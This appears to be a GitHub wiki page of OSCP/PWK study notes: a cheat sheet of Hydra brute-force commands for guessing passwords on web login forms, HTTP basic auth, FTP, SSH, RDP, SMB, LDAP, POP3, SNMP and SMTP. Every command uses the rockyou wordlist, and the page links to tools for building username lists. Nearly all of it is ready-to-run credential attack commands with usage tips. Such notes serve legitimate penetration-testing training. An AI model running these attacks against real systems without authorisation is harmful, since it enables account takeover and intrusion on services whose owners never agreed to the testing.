Brute Force - A1vinSmith/OSCP-PWK GitHub Wiki
Hydra
http-post-form
hydra -l name -P rockyou.txt $ip http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
hydra -L usernames.txt -P passwords.txt -f -v 10.10.33.144 http-post-form "/login.php:username=^USER^&password=^PASS^:Please enter the correct credentials"
ftp
hydra -t 4 -l name -P rockyou.txt -vV $ip ftp -s non-default-port
-t 4 sets 4 parallel connections per target. -s is only needed when the service listens on a non-default port.
ssh
hydra -l molly -P rockyou.txt $ip ssh -V
snmp, smtp
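hydra -P rockyou.txt -v $ip snmp/smtp
snmp/smtp is shorthand: run the command once per service, giving either snmp or smtp as the service name.
Popup box (HTTP authentication prompt)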
hydra -l bob -P rockyou.txt $ip http-get /protected
The trick here is to pass the IP and the path as separate arguments.
RDP
hydra -t 1 -V -f -l administrator -P rockyou.txt rdp://$ip
SMB, LDAP, POP3
hydra -L users.txt -P rockyou.txt $ip smb/ldap2/pop3 -V -f
smb/ldap2/pop3 is shorthand: give one of smb, ldap2 or pop3 as the service name.
Build username list
- https://github.com/A1vinSmith/OSCP-PWK/blob/master/HackTheBox/Windows/Active%20Directory/Sauna/README.md#username-anarchy-from-website-as-source
- https://github.com/A1vinSmith/username-anarchy?organization=A1vinSmith&organization=A1vinSmith
Tips
Try ZAP, Burp or Wfuzz as a backup.